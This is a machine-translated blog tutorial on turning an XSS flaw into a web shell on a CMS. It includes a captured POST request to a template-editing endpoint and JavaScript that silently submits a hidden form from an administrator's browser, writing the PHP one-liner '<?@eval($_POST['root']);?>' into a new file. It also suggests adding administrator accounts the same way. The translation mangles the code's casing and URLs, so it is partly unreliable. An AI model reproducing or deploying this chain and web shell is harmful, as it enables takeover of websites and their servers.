XSS can also getshell

My idea is that many CMS have the ability to modify templates or files.
We can construct an external URL to post and submit the modification template or other files to implement XSSgetshell! Similarly, this method can do a lot of things, such as adding an administrator account or something.
Prerequisites: You must log on as an administrator.
If the CMS system has XSS vulnerabilities, it will be more perfect.
I found a cms test with file addition, deletion, and modification at Will here (this CMS also has XSS, but it is not easy to use it for magic reasons, here I am just doing a test and writing html to simulate XSS)
First, make sure that CMS has the file editing function and can add the best
 

 
Then submit the packet capture (mainly refer to the parameters submitted by post)
Packet capture results
POST/dongtai/mydecms/moban. php? Action = act_add HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv: 10.0.2) Gecko/20100101 Firefox/10.0.2
Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8
Accept-Language: zh-cn, zh; q = 0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.bkjia.com/dongtai/mydecms/moban. php? Action = add
Cookie: DedeUserID = 1; DedeUserID _ ckMd5 = enabled; DedeLoginTime = 1332332156; DedeLoginTime _ ckMd5 = enabled; zdebuggerpresent = php, phtml, php3; PHPSESSID = Enabled
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
 
Filename = xss & mobantext = & content = by + alex & button = % CC % ED % BC % D3 % C4 % A3 % B0 % E5 % CE % C4 % BC % FE & id =
 
Submitted url:/dongtai/mydecms/moban. php? Action = act_add
Submitted file name: filename = xss
Submitted file content: content = by + alex
The two parameters are post
Let's construct a javascript post commit (to simulate XSS attacks, otherwise PHP or html will be used at Will)
 
Function PostSubmit (url, data, msg ){
Var postUrl = url; // The submitted url.
Var postData = data; // the first data
Var msgData = msg; // The second data
Var ExportForm = document. createElement ("FORM ");
Document. body. appendChild (ExportForm );
ExportForm. method = "POST"; // post submit
Var newElement = document. createElement ("input ");
NewElement. setAttribute ("name", "filename"); // file name
NewElement. setAttribute ("type", "hidden ");
Var newElement2 = document. createElement ("input ");
NewElement2.setAttribute ("name", "content"); // File content
NewElement2.setAttribute ("type", "hidden ");
ExportForm. appendChild (newElement );
ExportForm. appendChild (newElement2 );
NewElement. value = postData;
NewElement2.value = msgData;
ExportForm. action = postUrl;
ExportForm. submit ();
};
 
// Filename = test & mobantext = & content = haha & button = % CC % ED % BC % D3 % C4 % A3 % B0 % E5 % CE % C4 % BC % FE & id =
PostSubmit ("http: // www.2cto.com/dongtai/mydecms/moban. php? Action = act_add "," hack "," <? @ Eval ($ _ POST ['root']);?> "); // Then call
 
Save as test. js
Then, if there is XS, you can try to call this JS
I just called it in html for testing.
 
<Html>
<Head>
</Head>
<Body>
 
<Script src = "test. js">
</Script>
 
 
</Body>
</Html>

Upload 3 minutes agoDownload Attachment(46.41 KB)
Upload 3 minutes ago Download Attachment(58.82 KB)

 
This gives the Administrator the freedom to open the connection we constructed when logging on.
Such as: http://www.bkjia.com/xss/test.html

From: blog of a man like a dog